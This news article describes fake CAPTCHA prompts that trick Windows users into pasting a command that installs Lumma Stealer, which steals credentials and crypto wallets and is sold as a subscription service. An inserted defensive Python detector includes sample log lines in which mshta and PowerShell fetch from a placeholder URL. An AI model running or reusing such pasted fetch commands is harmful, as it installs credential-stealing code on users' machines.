Hackers Using Fake Captchas to Spread Lumma Stealer Malware

by shayaan

In short

  • Hackers are using fake CAPTCHAs to distribute Lumma Stealer malware, new research has found.
  • Once an unsuspecting user installs it, the malware scours the infected device for credentials, including crypto-wallet data.
  • Lumma Stealer is an example of malware-as-a-service, effectively run as a “sustainable cybercriminal company”, experts told Decrypt.

Bad actors are using fake CAPTCHA prompts to distribute the fileless Lumma Stealer malware, according to research by cybersecurity company DNSFilter.

First detected on a Greek bank’s website, the prompt asks Windows users to copy a command, paste it into a dialog box and then press Enter.

DNSFilter reports that its customers encountered the fake CAPTCHA 23 times over the course of three days, and that 17% of the people who saw the prompt completed the steps on screen, resulting in an attempt to deliver malware.
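The defender’s counterpart to the paste-into-a-dialog flow described above is to look for interpreters launched from the desktop shell with a command line that reaches out to a URL. The example below is added here and is not code from DNSFilter or the article; it assumes the dialog is the Windows Run dialog (whose child processes have explorer.exe as parent), a constructed `parent|image|command_line` log format, and an illustrative, non-exhaustive interpreter list.

```python
import re
from typing import NamedTuple

# Interpreters commonly used to execute pasted text (assumption: illustrative list, not exhaustive).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


class ProcEvent(NamedTuple):
    parent_image: str
    image: str
    command_line: str


def parse_event(line: str) -> ProcEvent:
    """Parse one 'parent|image|cmdline' record (constructed format, see lead-in)."""
    parent, image, cmdline = line.split("|", 2)
    return ProcEvent(parent.strip().lower(), image.strip().lower(), cmdline.strip())


def is_pasted_command_launch(ev: ProcEvent) -> bool:
    """Heuristic: an interpreter started by explorer.exe (the parent of anything typed into
    the Win+R Run dialog) whose command line references a URL. Ordinary Run-dialog use
    (notepad, a local 'dir') and script launches by a build tool do not match."""
    return (
        ev.parent_image == "explorer.exe"
        and ev.image in INTERPRETERS
        and URL_RE.search(ev.command_line) is not None
    )


def flag_events(lines: list[str]) -> list[ProcEvent]:
    """Return the events that match the heuristic, in log order."""
    return [ev for ev in map(parse_event, lines) if is_pasted_command_launch(ev)]


# Constructed sample events (hypothetical; example.invalid is a reserved, non-resolving domain).
SAMPLE_LOG = [
    "explorer.exe|notepad.exe|notepad.exe C:\\Users\\alice\\notes.txt",
    "explorer.exe|mshta.exe|mshta.exe https://example.invalid/verify",
    "devenv.exe|powershell.exe|powershell.exe -File build.ps1",
    "explorer.exe|powershell.exe|powershell.exe -c \"Invoke-WebRequest https://example.invalid/check\"",
    "explorer.exe|cmd.exe|cmd.exe /c dir",
]

if __name__ == "__main__":
    for ev in flag_events(SAMPLE_LOG):
        print(f"suspicious: {ev.image} <- {ev.parent_image}: {ev.command_line}")
```

On a real fleet the same check can be run over process-creation telemetry; pairing it with the clipboard-paste context (a user-initiated Run-dialog launch shortly after a browser visit) cuts false positives further.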

What is Lumma Stealer?

DNSFilter’s global partner evangelist, Mikey Pruitt, explained that Lumma Stealer is a form of malware that scours an infected device for credentials and other sensitive data.

“Lumma Stealer immediately sweeps the system for everything it can monetize: browser-saved passwords and cookies, stored 2FA tokens, cryptocurrency wallet data, remote-access credentials and even password manager vaults,” he told Decrypt.


Pruitt clarified that the bad actors use the stolen data for different purposes that usually all amount to monetary gain, such as identity theft and access to “online accounts for financial theft or fraudulent transactions”, as well as access to cryptocurrency wallets.

Lumma Stealer has a wide reach, according to Pruitt, and can be found on a wide range of websites.

“Although we cannot speak to how much has been lost through this one vector, this threat can exist on otherwise non-suspicious sites,” he explained. “This makes it incredibly dangerous, and important to be aware when things seem suspicious.”

Malware-as-a-service

Lumma Stealer is not just malware but an example of malware-as-a-service (MaaS), which security companies have reported is responsible for an increase in malware attacks in recent years.

According to ESET malware analyst Jakub Tomanek, the operators behind Lumma Stealer develop its features and refine its ability to evade malware detection, while also registering domains to host the malware.

He told Decrypt: “Their primary goal is to keep the service operational and profitable, collecting monthly subscription fees from affiliates – effectively running Lumma Stealer as a sustainable cybercriminal company.”

Because it removes the need for cybercriminals to develop malware and the underlying infrastructure themselves, MaaS offerings such as Lumma Stealer have proved stubbornly popular.

In May, the US Department of Justice seized five internet domains that bad actors used to operate Lumma Stealer, while Microsoft separately took down 2,300 related domains.

Nevertheless, reports have shown that Lumma Stealer has resurfaced since May, with a July analysis by Trend Micro showing that “the number of targeted accounts steadily returned to their usual levels” between June and July.


Malware’s global reach

Part of Lumma Stealer’s attraction is that subscriptions, which are often monthly, are cheap compared with the potential profit.

“Available on dark web forums for as little as $250, this advanced information stealer specifically targets what matters most to cybercriminals: cryptocurrency wallets, browser-stored credentials and two-factor authentication systems,” said Nathaniel Jones, a VP of security at Darktrace.

Jones told Decrypt that the scale of Lumma Stealer exploitation has been ‘alarming’, with 2023 seeing estimated losses of $36.5 million and 400,000 Windows devices infected in the space of two months.

“But the real concern is not only the figures, it is the multi-layered revenue strategy,” he said. “Lumma not only steals data, it systematically harvests browser history, system information and even AnyDesk configuration files before everything is exfiltrated to command centres controlled from Russia.”

Adding to the threat of Lumma Stealer is the fact that stolen data is often fed directly to ‘traffer teams’, which specialize in the theft and resale of credentials.

“This creates a devastating cascade effect where a single infection can lead to bank account hijacking, cryptocurrency theft and identity fraud that persists long after the initial breach,” added Jones.

While Darktrace suggested a Russian origin or centre for Lumma-related exploits, DNSFilter noted that the bad actors using the malware service could operate from several regions.

“It is common for such malicious activities to involve individuals or groups from several countries,” said Pruitt, adding that this is particularly common “with the use of international hosting providers and malware distribution platforms.”
